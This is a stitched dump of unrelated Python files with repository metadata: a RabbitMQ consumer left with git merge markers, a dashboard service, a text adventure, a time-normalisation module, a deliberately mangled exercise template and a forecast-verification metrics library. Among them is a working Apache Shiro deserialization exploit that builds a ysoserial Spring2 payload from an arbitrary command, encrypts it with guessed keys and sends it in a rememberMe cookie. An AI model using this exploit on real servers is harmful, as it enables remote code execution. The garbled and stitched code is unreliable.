IOVRegSvc = Service( "IOVRegistrationSvc" )
IOVRegSvc.OutputLevel = DEBUG
IOVRegSvc.RecreateFolders = RecreateFolder
# PoolSvc.FileOpen = "update"
###########################################################################
| [
"[email protected]"
] | |
86e96ae863d4f9f1817fcae036de87f3df2a15ec | e694891ff8c9d06df7b7b5def7ba71c1dba03aa8 | /rabbitmq_rabbitpy/test_rabbitmq.py | 23f166795359b1166e1d5e54aa4a636cf2e3c2e1 | [] | no_license | wangyu190810/python-skill | 78f9abb39ebfa01b92ffb2ec96c7ef57c490d68d | 719d082d47a5a82ce4a15c57dd481932a9d8f1ba | refs/heads/master | 2020-04-05T17:43:48.005145 | 2019-02-01T01:45:49 | 2019-02-01T01:45:49 | 41,524,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*-coding:utf-8-*-
# email:[email protected]
__author__ = 'wangyu'
<<<<<<< HEAD
=======
import rabbitpy
# with rabbitpy.Connection("amqp://guest:guest@localhost:5672/%2F") as conn:
# with conn.channel() as channel:
# amqp = rabbitpy.AMQP(channel)
#
# for message in amqp.basic_consume('queue-name'):
# print(message)
#
# import rabbitpy
with rabbitpy.Connection('amqp://guest:guest@localhost:5672/%2f') as conn:
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
while len(queue) > 0:
message = queue.get()
print 'Message:'
print ' ID: %s' % message.properties['message_id']
print ' Time: %s' % message.properties['timestamp'].isoformat()
print ' Body: %s' % message.body
message.ack()
print 'There are %i more messages in the queue' % len(queue)
>>>>>>> 85e7424cf14daa2d8af9040031bec995ac70cde1
| [
"[email protected]"
] | |
fb9705a0d1b4b5da9c80db0e6507fd386d90b160 | f28a261132fbf98f5ebfd004672af4155dfa1cc5 | /nanodash/service/dataset-description-nano-090.py | b6fd62ced21821aab7733a8570b3d22d64d38b3d | [
"Apache-2.0",
"MIT"
] | permissive | curtislisle/nanomaterial-dashboard | 8704779b7410747092c8fdb9326fb69b9f6b94ff | 06de2e0782f53ce56d6edd0937b14cbd738fc22a | refs/heads/master | 2021-01-21T04:41:16.713855 | 2016-07-08T01:07:17 | 2016-07-08T01:07:17 | 54,521,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #import bson
import pymongo
import json
from bson import ObjectId
from pymongo import MongoClient
import string
import tangelo
def run(ipaddress):
# Create an empty response object.
response = {}
response['datasource'] = 'remote'
response['file'] = "http://"+str(ipaddress)+":8080/nanodash/service/dataset-content-nano-090/NanoDB3/Nano_combined_0301"
response['name'] = "Nano Database Dashboard v0.9.0"
response['separator'] = ','
response['skip'] = 0
response['meta'] = [
{ "type": "id", "name": "NanomaterialID" },
{ "type": "string", "name": "Molecular Identity" },
{ "type": "string", "name": "Material Type" },
{ "type": "string", "name": "Molecular Type" },
{"type":"string","name":"Product Name"},
# {'name':'Mean Hydrodynamic Diameter','type':'float'},
{'name':'Mean Primary Particle Size','type':'float'},
# {'name':'Component Molecular Weight','type':'float'},
# {'name':'Molecular Weight','type':'float'},
{'name':'Lambda Max','type':'float'},
# {'name':'Bulk Density','type':'float'},
# {'name':'Primary Particle Size','type':'float'},
{'name':'Specific Surface Area','type':'float'},
{'name':'Zeta Potential','type':'float'}
]
response['sets'] = [
{ "format": "binary", "start": 1, "end": 5}]
response['setlist'] = ['2D Dimensionality','3D Dimensionality','Metal','Metal Oxide','Polymer','Carbohydrate',
'Protein','Nucleic Acid','Group Ii-Vi','Dendrimer','Lipid','Group Iv - Non C',
'Agglomerated','Aggregated','Positive Polarity','Negative Polarity','Purity99+','IsCrystalline',
'Aromatic','Macrocyclic','Sugar','VHQ-R subset', 'UHQ-R subset',
'source_pdf','source_nano_db']
#'Monoclinic','SingleCrystal','Polycrystalline','Amorphous','Anatase','Tetragonal','Rutile','Cubic','Brookite','Wurtzite','Zincite']
response['attributelist'] = []
response['author'] = 'ABCC IVG & KnowledgeVis'
response['description'] = 'Nanomaterial database v2'
response['source'] = "Nanomaterials reference database"
#tangelo.log(str(response))
return json.dumps(response)
| [
"[email protected]"
] | |
e173dd44edd47d50ac75298a2927da10f8cb5fc5 | a95236e2dccd588627c6f0a1542f37e26f6899f3 | /Chap04Functions/3-1-1.函数对象.py | a969ddb2ef7cb3670e7c3c086c3b5e4d44527a9f | [
"MIT"
] | permissive | royqh1979/programming_with_python | 43b1cf0ab1b6a54ad165e30991250cf7bf318bd6 | aa0603058f40b5bc7406e92c92134ee34f3b15e2 | refs/heads/master | 2023-06-11T02:11:59.590880 | 2023-05-29T06:39:03 | 2023-05-29T06:39:03 | 166,190,796 | 5 | 4 | MIT | 2023-02-15T23:13:33 | 2019-01-17T08:38:56 | Python | UTF-8 | Python | false | false | 70 | py | def fun1():
print("this is fun1")
print(fun1)
fun1=34
print(fun1) | [
"[email protected]"
] | |
bb32c9b355ff5984723a6f55c49c36cdbc32e17c | da280a226bbf15d7243410c0d3930bdca00d0088 | /firsttry/ex41.py | 0ba10ceba34cd4003844fa210c2ed0733881e028 | [] | no_license | c4collins/PyTHWay | 174cae57c73431ce5bfc90a361613c5db5c846d7 | 135b4b908ef2698084ee1b3fb9f1e5550c3c8843 | refs/heads/master | 2021-01-10T18:29:43.998528 | 2012-11-03T22:53:17 | 2012-11-03T22:53:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | from sys import exit
from random import randint
def death():
quips = ["You died. You kinda suck at this.", "Your mum would be proud, if she were smarter.", "Such a loser.", "I have a small puppy that's better at this."]
print quips[randint(0, len(quips)-1)]
exit(1)
def princess_lives_here():
print "You see a beautiful princess with a shiny crown."
print "She offers you some cake."
eat_it = raw_input("> ")
if eat_it == "eat it":
print "You explode like a pinata full of frogs."
print "The princess cackles and eats the frogs. Yum!"
return 'death'
elif eat_it == "do not eat it":
print "She throws the cake at you and it cuts off your head."
print "The last thing you see if her munching on your torso. Yum!"
return 'death'
elif eat_it == "make her eat it":
print "The princess screams as you cram the cake in her mouth."
print "The she smiles and cries and thanks you for saving her."
print "She points to a tiny door and says, 'The Koi needs cake too.'"
print "She gives you the very last bit of cake and shoves you in."
return 'gold_koi_pond'
else:
print "The princess looks at you confused and just points at the cake."
return 'princess_lives_here'
def gold_koi_pond():
print "There is a garden with a koi pond in the centre."
print "You walk close and see a massive fin poke out."
print "You peek in and a creepy looking huge Koi stares at you."
print "It opens its mouth waiting for food."
feed_it = raw_input("> ")
if feed_it == "feed it":
print "The Koi jumps up, and rather than eating the cake, eats your arm."
print "You fall in and the Koi shrugs then eats you."
print "You are then pooped out sometime later."
return 'death'
elif feed_it == "do not feed it":
print "The Koi grimaces, then thrashes around for a second."
print "If rushes to the other side of the pong, braces against the wall..."
print "The it *lunges* out of the water, up in the air and over your"
print "entire body, cake and all."
print "You are pooped out about a week later."
return 'death'
elif feed_it == "throw it in":
print "The Koi wiggles, then leaps into the air to eat the cake."
print "You can see it's happy, it gruts, thrashes..."
print "and finally rolls over and poops a magic diamond into the air."
print "It lands at your feet."
return 'bear_with_sword'
else:
print "The Koi gets annoyed and wiggles a bit."
return 'golden_koi_pond'
def bear_with_sword():
print "Puzzled, you are about to pick up the fish poop diamond when"
print "a bear bearing a load bearing sword walks in."
print "\"Hey, that's MY diamond! Where'd you get that!?\""
print "It holds its paw out and looks at you."
give_it = raw_input("> ")
if give_it == "give it":
print "The bear swipes at your hand to grab the diamond and"
print "rips your hand off in the process. It then looks at"
print "your bloody stump and says \"Oh crap, sorry about that.\""
print "It tries to put your hand back on, but you collapse."
print "The last thing you see is the bear shrug and eat you."
return 'death'
elif give_it == "say no":
print "The bear looks shocked. Nobody ever told a bear"
print "with a broadsword 'no'. It asks, "
print "\"Is it because it's not a katana? I could go get one!\""
print "It then runs off and you notice a big iron gate."
print "\"Where the hell did that come from?\" You say."
return 'big_iron_gate'
else:
print "The bear looks puzzled as to why you'd do that."
return 'bear_with_sword'
def big_iron_gate():
print "You walk up to the big iron gate and see there's a handle."
open_it = raw_input("> ")
if open_it == "open it":
print "You open it and you are free!"
print "There are mountains. And berries! And..."
print "Oh, but then the bear comes with his katana and stabs you."
print "\"Who's laughing now!? Love this katana.\""
return 'death'
else:
print "That doesn't seem sensible. I mean, the door's right there."
return 'big_iron_gate'
ROOMS = {'death': death, 'princess_lives_here': princess_lives_here, 'gold_koi_pond': gold_koi_pond, 'big_iron_gate': big_iron_gate, 'bear_with_sword': bear_with_sword}
def runner(map, start):
next = start
while True:
room = map[next]
print "\n--------"
next = room()
runner(ROOMS, 'princess_lives_here')
| [
"[email protected]"
] | |
faa87c8e3f067bcd7755c759e47e022742482bb8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /wbhjXmdbPSxCSE5hW_0.py | e9536e0fed2a7c9b48f0291977cccbacbce5b686 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
A magic sigil is a glyph which represents a desire one wishes to manifest in
their lives. There are many ways to create a sigil, but the most common is to
write out a specific desire (e.g. " _I HAVE WONDERFUL FRIENDS WHO LOVE ME_ "),
remove all vowels, remove any duplicate letters (keeping the last occurence),
and then design a glyph from what remains.
Using the sentence above as an example, we would remove duplicate letters:
AUFRINDSWHLOVME
And then remove all vowels, leaving us with:
FRNDSWHLVM
Create a function that takes a string and removes its vowels and duplicate
letters. The returned string should not contain any spaces and be in
uppercase.
### Examples
sigilize("i am healthy") ➞ "MLTHY"
sigilize("I FOUND MY SOULMATE") ➞ "FNDYSLMT"
sigilize("I have a job I enjoy and it pays well") ➞ "HVBJNDTPYSWL"
### Notes
* For duplicate letters the **last one** is kept.
* When performing actual sigil magic, you **must** make your sigils **manually**.
* Check the **Resources** tab for more info on sigils if you're interested in the concept.
"""
def sigilize(desire):
a = ''.join(desire.upper().split())
b = sorted(set(a), key=a.rindex)
return ''.join(i for i in b if i not in "AEIOU")
| [
"[email protected]"
] | |
e70cf9d6e63ff327f4103d60a0c7ba98634ec982 | 4d98abd2553e95856d835519424a60634fc4cdd3 | /CVE-2016-4437 Apache_Shiro_RCE/ShiroScan_1.2.4/moule/plugins/Spring2.py | 68bb19cf574477e3533d5a8f8ec6fe04827cd872 | [] | no_license | ANNS666/my_POC | 0157fa41bdd2d0f264e464b05bf9c75405083e44 | b3a38745609c9407a9bc0427f5dd55e4acfe6d70 | refs/heads/master | 2023-08-10T19:13:15.521562 | 2021-10-10T04:09:58 | 2021-10-10T04:09:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,658 | py | # -*- coding: utf-8 -*-
# By 斯文beast svenbeast.com
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import threadpool
from Crypto.Cipher import AES
from ..main import Idea
requests.packages.urllib3.disable_warnings()
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class26:Spring2')
class Spring2(object):
def process(self,url,command,resKey,func):
self.sendPayload(url,command,resKey)
def gcm_encode(self,resKey,file_body):
mode = AES.MODE_GCM
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv)
ciphertext, tag = encryptor.encrypt_and_digest(file_body)
ciphertext = ciphertext + tag
payload = base64.b64encode(iv + ciphertext)
return payload
def cbc_encode(self,resKey,file_body):
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv) #受key影响的encryptor
payload = base64.b64encode(iv + encryptor.encrypt(file_body))
return payload
def sendPayload(self,url,command,resKey,fp=JAR_FILE):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'Spring2', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
file_body = pad(popen.stdout.read()) #受popen影响的file_body
payloadCBC = self.cbc_encode(resKey,file_body)
payloadGCM = self.gcm_encode(resKey,file_body)
header={
'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;'
}
try:
x = requests.post(url, headers=header, cookies={'rememberMe': payloadCBC.decode()+"="},verify=False, timeout=20) # 发送验证请求1
y = requests.post(url, headers=header, cookies={'rememberMe': payloadGCM.decode()+"="},verify=False, timeout=20) # 发送验证请求2
#print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode())
if(x.status_code==200):
print("[+] ****Spring2模块 key: {} 已成功发送! 状态码:{}".format(str(resKey),str(x.status_code)))
else:
print("[-] ****Spring2模块 key: {} 发送异常! 状态码:{}".format(str(resKey),str(x.status_code)))
except Exception as e:
print(e)
return False
| [
"[email protected]"
] | |
b8fecdcd2f6db4c77f8c2dd91e69e1f8869ea920 | ff3da62ab2a336ba286ea320b8bf1eba5b1978ea | /normalization/time_Info/apm.py | e242dc16e93401a0d43eed4f9fa6c779d03c8403 | [] | no_license | llq20133100095/bert_ner_time | 9e17e9de77ff12b4ae5267986f646665066e070c | 9dc3baf5ca8f6d5cc7d4255bcfd913bd695c7b5e | refs/heads/master | 2021-10-28T14:59:17.217552 | 2019-04-24T06:12:22 | 2019-04-24T06:12:22 | 182,626,582 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/11/24 16:33
# @Author : honeyding
# @File : apm.py
# @Software: PyCharm
import re
class Apm:
apm_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?')
apm_hour_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?([0-9一二三四五六七八九两十]).*?')
def get_apm_info(self, entity, commonParser):
matcher = self.apm_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def judge_apm_hour(self, entity, commonParser):
matcher = self.apm_hour_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def adjustHours(self, entity, hour, commonParser):
if u"早" not in entity and u"上午" not in entity and u"晨" not in entity:
if u"中午" in entity:
if hour > 14 or hour > 2 and hour < 10:
print(u'不能是中午。')
commonParser.timeAPMInfo = str(hour) + u"点不能是中午。"
elif hour < 2 and hour > 0:
hour += 12
elif u"下午" not in entity and u"午后" not in entity:
if u"昨晚" in entity or u"明晚" in entity or u"傍晚" in entity or u"晚" in entity or u"晚上" in entity or u"夜里" in entity or u"今晚" in entity:
if hour > 12 and hour < 17 or hour >= 0 and hour < 5:
print(u'不能是晚上。')
commonParser.timeAPMInfo = str(hour) + u"点不能是晚上。"
elif hour >= 4 and hour <= 12:
hour += 12
else:
if hour > 0 and hour <= 12:
hour += 12
# if hour > 19 or hour < 1 or hour > 7 and hour < 12:
# print(u'不能是下午。')
# commonParser.timeAPMInfo = str(hour) + u'不能是下午。'
# elif hour > 0 and hour <= 7:
# hour += 12
elif hour > 12:
print(u'不能是上午或早上。')
commonParser.timeAPMInfo = str(hour) + u'点不能是上午或早上。'
return hour
if __name__ == '__main__':
apm_proc = Apm()
assert apm_proc.get_apm_info(u'早晨') is True | [
"[email protected]"
] | |
6e8da8e397cef33da10c132cc14befac799d08b6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/030_movie_data_analysis/save1_nopass.py | de9624e5838b09cfbf6dd63a838b4df2ba2feb25 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,495 | py | # _______ c__
# ____ c.. _______ d.., n..
# _______ __
# ____ u__.r.. _______ u..
#
# BASE_URL 'https://bites-data.s3.us-east-2.amazonaws.com/'
# TMP '/tmp'
#
# fname 'movie_metadata.csv'
# remote __.p...j.. B.. f..
# local __.p...j.. T.. f..
# u.. ? ?
#
# MOVIE_DATA local
# MIN_MOVIES 4
# MIN_YEAR 1960
#
# Movie n.. 'Movie', 'title year score'
#
#
# ___ get_movies_by_director
# """Extracts all movies from csv and stores them in a dict,
# where keys are directors, and values are a list of movies,
# use the defined Movie namedtuple"""
#
# d d.. l..
# full_list # list
#
# w__ o.. M.. newline='' __ file
# reader c__.D.. ?
# ___ row __ ?
# year ? 'title_year'
# __ ? !_ '' a.. i.. ? > 1960
# f__.a.. ? 'director_name' ? 'movie_title' .s.. i.. ? 'title_year' f__ ? 'imdb_score'
#
# ___ name, movie, year, score __ f..
# d name .a.. ? t.._m.. y.._y.. s.._s..
#
# r.. ?
#
#
# ___ calc_mean_score movies
# """Helper method to calculate mean of list of Movie namedtuples,
# round the mean to 1 decimal place"""
# scores movie.s.. ___ ? __ ?
# r.. r.. s.. ? / l.. ? 1
#
# ___ get_average_scores directors
# """Iterate through the directors dict (returned by get_movies_by_director),
# return a list of tuples (director, average_score) ordered by highest
# score in descending order. Only take directors into account
# with >= MIN_MOVIES"""
#
# p..
| [
"[email protected]"
] | |
f6781a69e1b2ae0d198cc5c11ac27d5d185fa49e | c3cc755ae500e87b6d5fa839efaa4d7d0f746d43 | /Part 1/Ch.6 Dictionaries/Nesting/pizza.py | f07401d2bb54c94f78013b95d7f88cd48287e6fd | [] | no_license | AngryGrizzlyBear/PythonCrashCourseRedux | 9393e692cdc8e5e28a66077bbc6c1e674642d209 | 28d48fa16fc238cf0409f6e987a3b4b72e956a92 | refs/heads/master | 2020-03-28T11:04:44.030307 | 2018-10-20T21:06:27 | 2018-10-20T21:06:27 | 148,175,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | # Store information about a pizza being ordered.
pizza = {
'crust': 'thick',
'toppings': ['mushrooms', 'extra cheese'],
}
# Summarized the order
print("You ordered a " + pizza['crust'] + "-crust pizza " +
"with the following toppings:")
for topping in pizza['toppings']:
print("\t" + topping) | [
"[email protected]"
] | |
a381405f3e7de92702f28ddc67b8a4d3d57494cd | 7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3 | /aoj/aoj-icpc/300/1315.py | fc47a7e25bc9e18a6c15f3d4e5a4aeac5a025693 | [] | no_license | roiti46/Contest | c0c35478cd80f675965d10b1a371e44084f9b6ee | c4b850d76796c5388d2e0d2234f90dc8acfaadfa | refs/heads/master | 2021-01-17T13:23:30.551754 | 2017-12-10T13:06:42 | 2017-12-10T13:06:42 | 27,001,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | while 1:
n = int(raw_input())
if n == 0: break
exist = set([])
enter = [0]*1000
bless = [0]*1000
for loop in xrange(n):
md,hm,io,p = raw_input().split()
h,m = map(int,hm.split(":"))
t = 60*h+m
p = int(p)
if io == "I":
enter[p] = t
exist.add(p)
else:
exist.remove(p)
if p == 0:
for i in exist: bless[i] += t-max(enter[p],enter[i])
elif 0 in exist:
bless[p] += t-max(enter[0],enter[p])
print max(bless)
| [
"[email protected]"
] | |
f23c206436ec78827ec7cbc0ab57a7c924a38e64 | 70087a0720037639297825a66135b9c985bbf586 | /verif/metric.py | 93c65c9b670eb008b0ef357dbd97079fe6539478 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rvalenzuelar/verif | 1ab854e2433a69378af8a867a1fb6f0efd1a4de0 | 034188cabd3a29136433be2ecb2f6555d3c03da8 | refs/heads/master | 2020-03-30T21:39:27.128496 | 2018-05-13T16:04:38 | 2018-05-13T17:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,947 | py | import inspect
import metric_type
import numpy as np
import sys
import scipy.stats
import verif.aggregator
import verif.axis
import verif.interval
import verif.util
def get_all():
"""
Returns a dictionary of all metric classes where the key is the class
name (string) and the value is the class object
"""
temp = inspect.getmembers(sys.modules[__name__], inspect.isclass)
return temp
def get_all_by_type(type):
"""
Like get_all, except only return metrics that are of a cerrtain
verif.metric_type
"""
temp = [m for m in get_all() if m[1].type == type]
return temp
def get_all_obs_fcst_based():
""" Like get_all, except only return obs-fcst-based metric classes """
metrics = [metric for metric in get_all() if issubclass(metric[1], verif.metric.ObsFcstBased)]
return metrics
def get(name):
""" Returns an instance of an object with the given class name """
metrics = get_all()
m = None
for metric in metrics:
if name == metric[0].lower() and metric[1].is_valid():
m = metric[1]()
return m
def get_p(data, input_index, axis, axis_index, interval):
"""
Retrieves and computes forecast probability and verifying observation for
being inside interval
Returns:
obs (np.array): True when observation is inside interval
p (np.array): True when forecast is inside interval
"""
p0 = 0
p1 = 1
if interval.lower != -np.inf and interval.upper != np.inf:
var0 = verif.field.Threshold(interval.lower)
var1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), var0, var1],
input_index, axis, axis_index)
elif interval.lower != -np.inf:
var0 = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), var0], input_index,
axis, axis_index)
elif interval.upper != np.inf:
var1 = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), var1], input_index,
axis, axis_index)
obsP = interval.within(obs)
p = p1 - p0 # Prob of obs within range
return [obsP, p]
def get_q(data, input_index, axis, axis_index, interval):
"""
Retrieve forecast quantile and verifying observation
Returns:
obs (np.array): True when observation is inside interval
p (np.array): True when forecast is inside interval
"""
p0 = 0
p1 = 1
var = verif.field.Quantile(interval.lower)
[obs, q] = data.get_scores([verif.field.Obs(), var], input_index, axis, axis_index)
return [obs, q]
class Metric(object):
""" Class to compute a score for a verification metric
Scores are computed by retrieving information from a verif.data.Data object.
As data is organized in multiple dimensions, scores are computed for a
particular verif.axis.Axis. Also data objects have several input files, so
scores are computed for a particular input.
The ObsFcstBased class offers a simple way to design a metric that only
uses observations and forecasts from data.
Class attributes:
description (str): A short one-liner describing the metric. This will show
up in the main verif documentation.
long (str): A longer description. This will show up in the
documentation when a specific metric is chosen.
min (float): Minimum possible value the metric can take on. None if no min.
max (float): Maximum possible value the metric can take on. None if no max.
require_threshold_type (str) : What type of thresholds does this metric
require? One of 'None', 'deterministic', 'threshold', 'quantile'.
supports_threshold (bool) : Does it make sense to use '-x threshold' with this metric?
supports_field (bool) : Does it make sense to use '-x obs' or '-x fcst' with this metric?
orientation (int): 1 for a positively oriented score (higher values are better),
-1 for negative, and 0 for all others
reference (str): A string with an academic reference
supports_aggregator: Does this metric use self.aggregator?
type (verif.metric_type.MetricType): What type of metric is this?
To implement a new metric:
Fill out cls.description and implement compute_core(). The other class
attributes (see above) are optional.
"""
# This must be overloaded
description = None
# Default values
long = None
reference = None
orientation = 0
min = None
max = None
default_axis = verif.axis.Leadtime() # If no axis is specified, use this axis as default
default_bin_type = None
require_threshold_type = None
supports_threshold = False
supports_field = False
perfect_score = None
aggregator = verif.aggregator.Mean()
supports_aggregator = False
type = verif.metric_type.Deterministic()
def compute(self, data, input_index, axis, interval):
""" Compute the score along an axis
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
axis (verif.axis.Axis): Axis to compute score for for
interval: Compute score for this interval (only applies to some metrics)
Returns:
np.array: A 1D numpy array of one score for each slice along axis
"""
size = data.get_axis_size(axis)
scores = np.zeros(size, 'float')
# Loop through axis indices
for axis_index in range(0, size):
x = self.compute_single(data, input_index, axis, axis_index, interval)
scores[axis_index] = x
return scores
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Computes the score for a given slice
Arguments:
data (verif.data.Data): data object to get information from
input_index (int): input index to compute the result for
axis (verif.axis.Axis): Axis to compute score for for
axis_index (int): Slice along the axis
interval: Compute score for this interval (only applies to some metrics)
Returns:
float: Value representing the score for the slice
"""
raise NotImplementedError()
def label(self, variable):
""" What is an appropriate y-axis label for this metric? Override this if
the metric does not have the same units as the forecast variable """
return self.name + " (" + variable.units + ")"
class ClassProperty(property):
def __get__(self, cls, owner):
return self.fget.__get__(None, owner)()
@ClassProperty
@classmethod
def name(cls):
""" Use the class name as default
"""
return cls.get_class_name()
@classmethod
def is_valid(cls):
""" Is this a valid metric that can be initialized? """
return cls.description is not None
@classmethod
def help(cls):
s = ""
if cls.description is not None:
s = cls.description
if cls.orientation is not 0:
s = s + "\n" + verif.util.green("Orientation: ")
if cls.orientation == 1:
s = s + "Positive (higher values are better)"
elif cls.orientation == -1:
s = s + "Negative (lower values are better)"
else:
s = s + "None"
if cls.perfect_score is not None:
s = s + "\n" + verif.util.green("Perfect score: ") + str(cls.perfect_score)
if cls.min is not None:
s = s + "\n" + verif.util.green("Minimum value: ") + str(cls.min)
if cls.max is not None:
s = s + "\n" + verif.util.green("Maximum value: ") + str(cls.max)
if cls.long is not None:
s = s + "\n" + verif.util.green("Description: ") + cls.long
if cls.reference is not None:
s = s + "\n" + verif.util.green("Reference: ") + cls.reference
return s
@classmethod
def get_class_name(cls):
name = cls.__name__
return name
class ObsFcstBased(Metric):
""" Class for scores that are based on observations and deterministic forecasts only """
type = verif.metric_type.Deterministic()
supports_field = True
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
assert(obs.shape[0] == fcst.shape[0])
if axis == verif.axis.Obs():
I = np.where(interval.within(obs))
obs = obs[I]
fcst = fcst[I]
elif axis == verif.axis.Fcst():
I = np.where(interval.within(fcst))
obs = obs[I]
fcst = fcst[I]
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval=None):
""" Compute the score using only the observations and forecasts
obs and fcst must have the same length, but may contain nan values
Arguments:
obs (np.array): 1D array of observations
fcst (np.array): 1D array of forecasts
Returns:
float: Value of score
"""
# Remove missing values
I = np.where((np.isnan(obs) | np.isnan(fcst)) == 0)[0]
obs = obs[I]
fcst = fcst[I]
if obs.shape[0] > 0:
return self._compute_from_obs_fcst(obs, fcst)
else:
return np.nan
def _compute_from_obs_fcst(self, obs, fcst):
""" Compute the score
Obs and fcst are guaranteed to:
- have the same length
- length >= 1
- no missing values
"""
raise NotImplementedError()
class FromField(Metric):
supports_aggregator = True
supports_field = True
def __init__(self, field, aux=None):
""" Compute scores from a field
Arguments:
field (verif.field.field): Retrive data from this field
aux (verif.field.Field): When reading field, also pull values for
this field to ensure only common data points are returned
"""
self._field = field
self._aux = aux
def compute_single(self, data, input_index, axis, axis_index, interval):
fields = [self._field]
axis_pos = None
if axis == verif.axis.Obs():
if self._field != verif.field.Obs():
fields += [verif.field.Obs()]
axis_pos = len(fields) - 1
elif axis == verif.axis.Fcst():
if self._field != verif.field.Fcst():
fields += [verif.field.Fcst()]
axis_pos = len(fields) - 1
if self._aux is not None:
fields += [self._aux]
values_array = data.get_scores(fields, input_index, axis, axis_index)
values = values_array[0]
# Subset if we have a subsetting axis
if axis_pos is not None:
I = np.where(interval.within(values_array[axis_pos]))[0]
values = values[I]
return self.aggregator(values)
def label(self, variable):
return self.aggregator.name().title() + " of " + self._field.name()
class Obs(FromField):
""" Retrives the observation
Note: This cannot be a subclass of ObsFcstBased, since we don't want
to remove obs for which the forecasts are missing. Same for Fcst.
"""
type = verif.metric_type.Deterministic()
name = "Observation"
description = "Observed value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Obs, self).__init__(verif.field.Obs())
def label(self, variable):
return self.aggregator.name().title() + " of observation (" + variable.units + ")"
class Fcst(FromField):
type = verif.metric_type.Deterministic()
name = "Forecast"
description = "Forecasted value"
supports_aggregator = True
orientation = 0
def __init__(self):
super(Fcst, self).__init__(verif.field.Fcst())
def label(self, variable):
return self.aggregator.name().title() + " of forecast (" + variable.units + ")"
class Mae(ObsFcstBased):
description = "Mean absolute error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
name = "Mean absolute error"
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(abs(obs - fcst))
def label(self, variable):
return "MAE (" + variable.units + ")"
class Bias(ObsFcstBased):
name = "Bias"
description = "Bias (forecast - observation)"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst - obs)
class Diff(ObsFcstBased):
name = "Diff"
description = "Difference in aggregated statistics (agg(forecast) - agg(observation))"
perfect_score = 0
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator(fcst) - self.aggregator(obs)
class Ratio(ObsFcstBased):
name = "Ratio"
description = "Ratio of aggregated statistics (agg(forecast) / agg(observation))"
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = self.aggregator(fcst)
denum = self.aggregator(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return "Ratio"
class Ef(ObsFcstBased):
name = "Exceedance fraction"
description = "Exeedance fraction: fraction of times that forecasts > observations"
min = 0
max = 1
perfect_score = 0.5
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
Nfcst = np.sum(obs < fcst)
return Nfcst / 1.0 / len(fcst)
def label(self, variable):
return "Fraction fcst > obs"
class StdError(ObsFcstBased):
name = "Standard error"
description = "Standard error (i.e. RMSE if forecast had no bias)"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
